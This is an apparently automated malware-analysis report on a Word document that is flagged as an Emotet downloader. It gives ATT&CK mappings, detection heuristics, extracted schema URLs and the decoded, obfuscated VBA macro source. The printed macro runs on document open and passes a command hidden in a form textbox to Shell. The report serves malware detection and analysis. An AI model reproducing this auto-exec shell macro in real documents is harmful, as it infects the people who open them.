MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is an OOXML document containing a VBA macro with a Document_Open auto-execution routine. This macro utilizes the Shell() function to execute a command, likely to download and run a secondary payload. ClamAV detection identifies it as Emotet, a known downloader family.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6869634-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6869634-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2028 bytes |
SHA-256: f575305918dae4af09886c96638f780ba1326f452b3af7db3097ac936bd8bd45 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call z
End Sub
Attribute VB_Name = "ET3dl"
Sub yKhfqA()
End Sub
Public Sub z()
Dim iTF0t6MHV As Single
iTF0t6MHV = 51443.538064102
Dim TOn9lamf As Double
TOn9lamf = Sgn(24237.439338447)
Dim gWneoH
gWneoH = LCase(be7fZ)
Dim xuixBz As Integer
xuixBz = Sgn(10512)
Dim IxDeQck As Single
IxDeQck = 41379.156175635
Dim FEhAj3k As Byte
FEhAj3k = 156
Dim tpQR13NzE As Long
tpQR13NzE = -1581512616
Dim lvwYGO8j As Byte
lvwYGO8j = 126
Dim pUFqucYoV As Byte
pUFqucYoV = 29
Dim acL0N8V As Double
acL0N8V = Val(60250.226249357)
Dim QjPW5E As Byte
QjPW5E = 46
Dim vZmAM As Integer
vZmAM = Sgn(27412)
cQIhewDGN = VBA.Shell(fUvmst, 0)
End Sub
Attribute VB_Name = "UyPhS9"
Sub mxHcL1ngG()
End Sub
Sub KflrRbWZc()
End Sub
Attribute VB_Name = "M18aXQk"
Sub IfzUtDq()
End Sub
Public Function fUvmst()
Dim jewN5xGF4 As Double
jewN5xGF4 = Sgn(3.1323832915231)
Dim FoyZEO6 As Integer
FoyZEO6 = -32124
Dim yr4a0K As Object
Set yr4a0K = New fm
Dim iuALWPnso As Double
iuALWPnso = 58152.134397185
ekbswJ8C = "mxKHzoRi1SXQtVNJHsZNr2"
fUPfnbQpu = 32103 / 10701
eyOGI = -3008 + 3016
xVaEh = Mid(ekbswJ8C, fUPfnbQpu, eyOGI)
Dim rWpiO As Double
rWpiO = 40666.530738674
Dim lf6GL As Long
lf6GL = Sgn(0)
Dim qCwh456 As Boolean
qCwh456 = True
If 18045 / 45 = 1188 - 1172 Then
zJyr1Cwup = "AOBkG"
End If
fUvmst = yr4a0K.mynewtxt.Text
End Function
Attribute VB_Name = "fm"
Attribute VB_Base = "0{AA7073C8-E9EB-488D-92E5-788807E9BE1F}{2A58C9F4-1DE7-48AF-9FAB-149F610DA65B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 23552 bytes |
SHA-256: 32450fa46d5667529adf066c8be6623b6a6369ac42c9fc966778f616e9562b6e |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.